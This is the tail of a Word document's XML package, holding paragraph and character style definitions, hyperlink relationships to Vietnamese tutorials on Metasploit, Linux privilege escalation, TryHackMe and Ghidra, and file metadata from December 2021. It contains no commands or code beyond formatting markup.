  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="009D2271"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Caption">
    <w:name w:val="caption"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="35"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00E127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97D83"/>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B53014"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
      </w:tabs>
      <w:spacing w:after="100"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC2">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00197D83"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="280"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC3">
    <w:name w:val="toc 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00197D83"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="560"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00197D83"/>
    <w:rPr>
      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="TableGrid">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="00F437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paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00C83A91"/>
    <w:pPr>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:val="vi-VN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="mb-0">
    <w:name w:val="mb-0"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="00C83A91"/>
    <w:pPr>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:val="vi-VN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Emphasis">
    <w:name w:val="Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="20"/>
    <w:qFormat/>
    <w:rsid w:val="007322BE"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Strong">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rsid w:val="007322BE"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC4">
    <w:name w:val="toc 4"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="007322BE"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="840"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC5">
    <w:name w:val="toc 5"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00BB5102"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="1120"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="HTMLPreformatted">
    <w:name w:val="HTML Preformatted"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HTMLPreformattedChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="002B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2B2F65"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:val="vi-VN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="pln">
    <w:name w:val="pln"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="002B2F65"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="pun">
    <w:name w:val="pun"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="002B2F65"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="lit">
    <w:name w:val="lit"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="002B2F65"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="kwd">
    <w:name w:val="kwd"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="002B2F65"/>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00B47971"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="a0">
    <w:basedOn w:val="TableNormal"/>
    <w:pPr>
      <w:spacing w:line="240" w:lineRule="auto"/>
    </w:pPr>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hyperlink" Target="https://linuxteamvietnam.us/huong-dan-hoc-metasploit-framework-rat-chi-la-co-ban/" TargetMode="Externa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footer" Target="footer4.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hyperlink" Target="https://helpex.vn/article/hieu-sau-hon-ve-cac-cuoc-tan-cong-leo-thang-dac-quyen-608ea6512744c49a00465af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https://tryhackme.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hyperlink" Target="https://tuhocnetworksecurity.business.blog/2021/01/12/kali-linux-can-ban-bai-3-gioi-thieu-metasploit/" TargetMode="Externa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hyperlink" Target="https://viblo.asia/p/leo-thang-dac-quyen-trong-linux-linux-privilege-escalation-0-using-sudo-rights-3Q75w8x2KWb"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yperlink" Target="https://blog.desdelinux.net/vi/ghidra-un-conjunto-de-herramientas-de-ingenieria-inversa-de-la-nsa/"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YhU3uDphk68DGxuHDWavT70fog==">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2D44BA-621F-41BD-B623-F5D41DB3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1</Pages>
  <Words>9940</Words>
  <Characters>5666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Văn Cường</dc:creator>
  <cp:lastModifiedBy>Cường Lee</cp:lastModifiedBy>
  <cp:revision>10</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-12-09T16:54:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-12-10T10:47:00Z</dcterms:modified>
</cp:coreProperties>
</file>